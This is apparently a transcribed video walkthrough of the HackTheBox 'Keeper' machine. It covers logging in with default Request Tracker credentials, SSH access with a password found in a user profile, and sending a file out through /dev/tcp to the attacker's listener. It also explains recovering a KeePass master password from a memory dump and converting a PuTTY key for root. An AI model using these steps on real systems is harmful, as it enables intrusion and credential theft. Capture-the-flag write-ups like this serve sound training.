What's going on YouTube? This is Ipsec. I'm doing Keeper from HackTheBox, which was a really easy machine, but super interesting if you looked into one of the exploits. It starts off with just a request tracker website, which is just a help desk. It has the default creds. You log into it, you look at a user, you get their password to SSH into the machine. In their home directory, there's a keepass database that has a password on it and a memory dump. A lot of people just Google like extract keepass password from memory dump, run the program, get the password, and that's pretty much the box. You have to convert a putty key to open SSH, but that's the gist of it. However, the way it actually gets the password from that memory dump is super interesting. I remember there being a lot of commotion around this, and people are like, why is there a CVE for a password being in memory? But it's interesting when you look into it because this one in particular isn't using the password to decrypt it. That's not why it's in memory. It's in memory because the text box put it in there as someone typed it. So we'll get into that when we go into the video. So let's just jump in. As always, we're going to start off with an nmap, so -sc for default scripts, sv enumerate versions, oa output all formats, put in the nmap directory and call it keeper, then the IP address of 10.10.11.227. This can take some time to run, so I've already ran it. Looking at the results, we have just two ports open, the first one being SSH on port 22, and its banner tells us it's an Ubuntu server. We also have HTTP on port 80. Its banner tells us it's Nginx also running on Ubuntu. So let's go take a look at this website since there's really not much else for us to look at. So HTTP 10.10.11.227, and we get a link here that says to raise an IT support ticket, please visit tickets.keeper.htb. So let's go ahead and add this to our host file. So sudo v etc host, and then 10.10.11.227, and put in that. I'm also going to add keeper.htb just to see if there's ever a website there. Okay. So now let's click this link since it should go through, and we get a login prompt. This is request tracker. We see the version right here, 4.4.4. I'm going to Google like when this was released. So we can say request tracker 444, go over to Google, and maybe 2017. And it's funny that this is their official documentation. They're calling this hacking, but it's a open source request tracker. So I'm guessing hacking means like adding in some custom workflows and doing things like that. It is not malicious. It's just funny to see that terminology here. So it's looking like this may be relatively old. If we search for this entire thing, go to Google, search the banner, we can see where it exists in Ubuntu. Accept all, visit site. Let's see, request tracker. Click here. What date was this? So we see a change log. They're fixing a cross-site scripting. And this was December of 2023. So the versioning for request tracker seems to be pretty odd. I'm guessing 4.4.4 is, there's another version after that, and the distribution is handling that, or maybe. I don't fully understand what's going on there, right? The copyright also says 2019. Let's go to github.com, or not GitHub, exploitdb. I could do it on my computer, but I have a habit of not updating this, so it's always more up to date if I just go to the page. And we see 2013 is the last exploit. We could do like RT and kind of look for it, but there's going to get a lot of results there. I don't think there's any public exploits, right? So the next thing I would do is probably Google default password. So request tracker default password. And then let's try to log in. And it says username, root, password of password. So let's try those credentials. So root and password. And we get logged in, which doesn't happen all the time, but it happens more often than you'd expect when you're on an internal network. We see there is one ticket in the queue. And if I didn't say it, request tracker is just like a help desk. It's got a very old feel to it. It shows you a lot of information right when you log in. A lot of newer things try to like not overload you with information. But let's click on the general ticket. We see issue with keepass client on Windows. And it's created by the webmaster who was not even going to attempt to pronounce that name. And it says, attached to this ticket is a crash dump of the KeePass program. Should she update the program first? And it looks like they have removed the attachment here for security reasons. And it says it is saved to the home directory. If we try to download it, we're just getting that message. There's no attachments here. It's just a text.html thing. Because if I click on it, that was weird. There we go. It wants us to log in again. And there you go. It's the ticket. So nothing really fancy there. 35.2. I was wondering if there was like an IDOR vulnerability, right? Because we have attachments 35.1. What was that other one? Let's go back here. Download 39.8. Maybe I would do like fuzzing around this to see if I can download attachments. It doesn't really make sense to me of how it's attached. I'm guessing this is message 38 or something, because we see there's a few things here. So if this was 35, 36, 37, 38. So yeah, that's how that works. I don't know where the /8 came from, and this one was a /1, but I'm not sure. So since we're admin, let's see what else we can do. If I go to users, there is the Lisa user and root. If I click on Lisa, we see she is a help desk agent from, I'm guessing that's somewhere in Denmark. Let's Google this. Yeah, Denmark. So the password is set to welcome 2023. So let's attempt to log in. So we'll do SSH. What is the username? This at keeper.htb. And then we want to send in the password. And there we have it. Request tracker 30,000.zip. That is the ticket ID number, right? If I went all the way back here, we went in this ticket. That is ticket ID 30,000. So let's send this over to our desktop. So I'm going to do nc lvmp 9001, and we'll redirect it to nc 30,000.zip. And then let's just cat this file and send it over. So dev tcp 10.10.14.8 9001. And while it's transferring, I can explain why my mentality shifts when I'm sending a file from the attacker versus downloading it from my box, right? I got that question last week. The main reason is just habit, right? Normally when I'm doing a pen test or red team and I'm on the target, I don't have the ability just to stand up a port and then download from it because port address translation or network address translation, NAT, prevents you, right? You're not on a routable IP address. But when I'm the attacker and I want to host a file, I control that routable IP address because I'm controlling the network at that point. So I can just use HTTP and it's a lot easier, right? So that's why my mentality shifts between how I download files based upon getting it from the target or my host. So now that the file is downloaded, I'm going to make a directory. And I'm always in the habit of creating a directory before I, what is the word? Unzip something, just because I really hate when I unzip something and it doesn't create a directory and just clobbers everything. So that's just the habit I am in. And it looks like we have a KeePass dump. So just like the ticket says, we have a KeePass database and a KeePass dump file. I bet if I do KeePass CLI on this, I think I actually have to do open. There's probably like a -o flag, but it wants a master password. So I'm guessing the password exists somewhere in this dump file. So let's go and Google extract KeePass password from dump, and then go over to Google. And this is the very first one. There's some Python scripts that also do it. I'm just going to use the original one, and I already have .NET installed on my Linux box. So we can just run it, right? And after we run it, we're going to explain what it's doing because this isn't really that interesting, right? I'm just going to do .NET run and then specify the dump file. And that's going to compile this project, which is this program.cs. and it finds potentially a password. We have M bracket D grod mid fraud, I guess, is what it thinks the password is. And if we attempt to log in here, let's do, we can probably just do an SU command, right? Oh no, it's the keepass password. So keepass, kpcli, open passcodes.kdbx, put in that password, and the database did not load. If we Google that string, let's see, we get this rod midfraud, which explains what it is. I'm guessing it's a famous dish in Denmark. I do the open, and we can log in. But before I go pillaging this, I want to talk about this exploit because it is really, really interesting once you look into it. So if we go back to the GitHub page, the author did a good job of explaining it. So that's what we did. And when I first heard about this on Twitter, I was just like, wait, how's a CVE about this, right? Because this is just a password in a memory dump. Of course it's like that, right? Memory dumps will often contain passwords. Like if you do a Windows Mimikatz, you can dump all the passwords out of LSASS, and those are all clear text. So why is that a CVE? And if you look into it, KeePass tries its best to never store the master password in the clear text for as long as possible. However, they made a mistake with the text box of their application, which is really interesting to me because I never really thought of this attack path, right? When I'm typing something into KeePass, let's just do it again. Let's do kpcli, open this. When I'm typing it in, at least on Windows, it shows you the character you're typing and then puts stars everything beforehand, right? And when it's doing this, it's actually saving strings in memory. I have no idea how the person found this. I think this secure text box X is unique to KeePass. It does talk about other frameworks having better ways to store passwords, right? That prevents this. So in this example, it's saying, example, when we type password, the strings in memory will be a dot then A, 2 dots then S, 3 dots then S, 4 dots then W, and you get the point, right? So every time you're typing in that text box, it's saving something to memory, and it's just hard to clear the memory after that, right? Let's see. There's a refactor. I'm looking for something. There's a Python and Rust implementation there, but I do want to go to this page to talk about it because there was a few interesting things I found here. Let's see. What is it? Text box. So here the author is saying, like, I don't know if this is a vulnerability, kind of for the same thing that I said, like it's a password in memory. And then they're explaining it, and I forget exactly what I wanted to highlight here, but they're talking about this text box is only in KeePass. It's part of this field. Other frameworks like WPF have dedicated password boxes, e.g. password box. I've always seen like password boxes when I do any type of UI programming, but I never knew like some of them may have some logic to not put strings there. I thought it was just for the masked field. So that was a really interesting thing that was in this. There's one thing that I just found slightly funny. If we go near the bottom, you have someone saying antivirus is flagging this as ransomware, and he's running the dev build. And it's probably just a false positive because the KeePass file is not signed yet, right? And that's just showing how one way to bypass a lot of antivirus is just to sign your stuff with a legitimate signature. It attributes it to you. So antivirus trust it a little bit more, but a lot of times it'll just start ignoring files, right? Even KeePass, if it's not signed, apparently gets flagged by antivirus. So I found that interesting. But enough talking, let's get back to doing something technical, right? So we saw how the exploit worked in a program, but we should be able to test it with just like strings or grep or something like that, right? So I'm going to go back in this and we're going to do a strings on this. And then I'm going to, first, if I do a printf and we do 2 backslashes, that's going to do hex, and we'll do 41, capital A. If you do a lot of buffer overflows, you know 414141, like all A's, right? So that's how we can put hex in. If we go to the actual source of this, and this will be just it acquiring the memory. Let's see, where is it? Let's see, right here is what I want. So this is where it's actually looking for the string. So we have the hex CF25, and that's going to equal the masked character. And we're saying if the first character is that and the second character is 25, then we know it is a masked character, and we want to get the next non-masked character after this, right? So theoretically, if we just do a strings on this memory dump, we get a lot of strings. But if I do a grep, and then we say we want to do printf backslash x cf, what was the next one, to 5, like this. So we're going to grep for this special character, and we get nothing. But strings does have a few encoding methods, right? If we do a -e, we can either specify S or capital S, B or capital B, L or capital L. The lowercase is 7-bit, uppercase is 8-bit. I'm going to just do strings -e capital S and see what we get. We have it matching. It says binary file. So to get rid of that, we do a -a to scan the entire thing, and it'll also show us binary things. We get a lot more strings this way. So the next thing we could do is say we want the string to start with this, right? Because we're just showing this character everywhere. And on a terminal, for some reason, it shows as %, not that other thing. And here we go. We have it showing the password, right? If we want it to be a little bit more accurate, we could say we want to see 2. And I forgot to do a X here. So that's going to filter off a lot more things. And let's go back to what the password actually was. Let's see. Nope. There we go. That's the password. So if we go to the top, let's see how this is working, right? And it stores the string in memory a lot. Okay. So we have a masked character and then a D. There's the D. For some reason, we didn't capture the first character or this one. I'm guessing we didn't capture that because it's a weird character. But there's the D. Then we have 3 masked characters and then a G. And then 4 masked characters and then an R. 5 masked characters. And it does not get the 5. It's like confused here, right? I'm guessing again because this is just a weird code. Then we go to D. Then the next one, it'll probably be like a space. It doesn't get that. Then we get M, E, D, F, L, something, D, E, right? So that's how the exploit worked. Hopefully you guys enjoyed looking at that because I find it fascinating when a text box is the cause for leaking password, right? It looks like the keepass devs did their best to like free up the memory, make sure it didn't exist in memory, but fooled by the UI, I guess. I've never seen that before. It's fascinating to me. So now that we're in keepass, we can do an ls and we can say, what's in email? Nothing. Like what's in internet? Nothing. If we go into internet, nothing there. If we go into email, nothing there. Let me just start over. I did something wrong, I think. I'm going to copy this so we can log in. kpcli, open passcodes, paste in this password. The other interesting thing on this, I know, swear last time I'm talking about it. Go back here. Come on. This is what really caught my attention. This bold text. The password has to be typed on the keyboard, not copied from clipboard. Apparently, if you copy it, then it like doesn't store it in memory. that text box. So that's what made me really look into that. So now let's go this. Okay, so passcodes. Where was I before? Maybe it's because I did open passcodes.kd. No. So I open it there. Then I did it ls. Maybe because I had the wrong master password. I'm not sure what was going on, but if we go in passcodes now, we have more. We have email, general, home banking. I don't mean to do ls. If we do ls internet or that, if we go into network, there we have an entry. So if we do a show 0, we have a note of a putty key file. Then we have root and then something hidden. But if I do help show, there is a -a and -f. Let's see, -a option to see created modified times, and I think -f will show me hidden fields. So if I do the -f, we can see a pass. So let's try logging in with this password. So I'm just going to go over here. We'll do su dash, put in this password, and it doesn't exist. Is that what that's what's on my clipboard. So that password does not work. Maybe the password is protecting this putty key. However, there is no encryption on it, so I don't think that's going to be the case. So let's just extract this putty key anyways. So I'm going to highlight everything. Then let's go and create a file. So I'll call this root.ppk. That's putty private key is the extension. And then let's get rid of everything with a space. So I'll do slash, and then we'll do space plus G. I screwed up my regex. Let's just do, how many spaces is this? 1, 2, 3, 4, 5, 6, 7 spaces. So we'll do S, 1, 2, 3, 4, 5, 6, 7, G. There we go. And what we want to do is, I think puttygen. So convert putty key to openssh is the format, I think. Go here. And then we want to run puttygen. If we don't have it, it's saying it's in putty tools. So let's try running this. Puttygen not found. And if we didn't know it was in putty tools, my favorite way of finding it is just do a sudo apt cache search puttygen. And this tells me where puttygen exists. It looks like it's in putty tools. So if we do sudo apt install putty tools, we can download it and then run it again. And oh, we have to make the better file. So we call it root.ppk. And it says putty key format to new. So if I Google this, let's see what it says. Let's see. So if you have version 3, let's look at what version we are. We are definitely version 3. It wants us to downgrade. And it looks like the new format was in putty 7.75. Let's look at what version of puttygen we just downloaded. Is it -V? It is 7.4. So we have to get puttygen 7.5. It's pretty much a pain to get putty because the source code is on the website. They don't really give you Linux binaries. Here's the latest release. Let's download the source. wget make dir putty tar zxvf putty 080. Okay. Configure? There is no configure. Let's see. cmake. To compile this, simplest way on any Linux. cmake dot. And then it wanted cmake build, right? Cmake build dot. And this should build the latest copy of putty. It'll give us a couple binaries, probably like the putty SSH binary, the putty gen. There's a few other ones, but all we need is putty gen. And I guess I'm going to pause the video and we'll just resume it when this is done, because I think after, oh, never mind. We should have it. If I go to utils, is it in? Nope. Let's see. Find.-name putty gen. It's just in the root. So I'm going to move, or we'll copy putty gen up to directories. And then let's do, where is the putty command? There we go. I do a /putty gen, and it looks like it converted it. I don't know if we want ID DSA as the name, but I don't think it really matters. Let's chmod 600 it, sh-I, ID DSA, root at keeper.htb, and we get logged in, and that's the box. So hope you guys enjoyed it. Take care, and I'll see you all next time.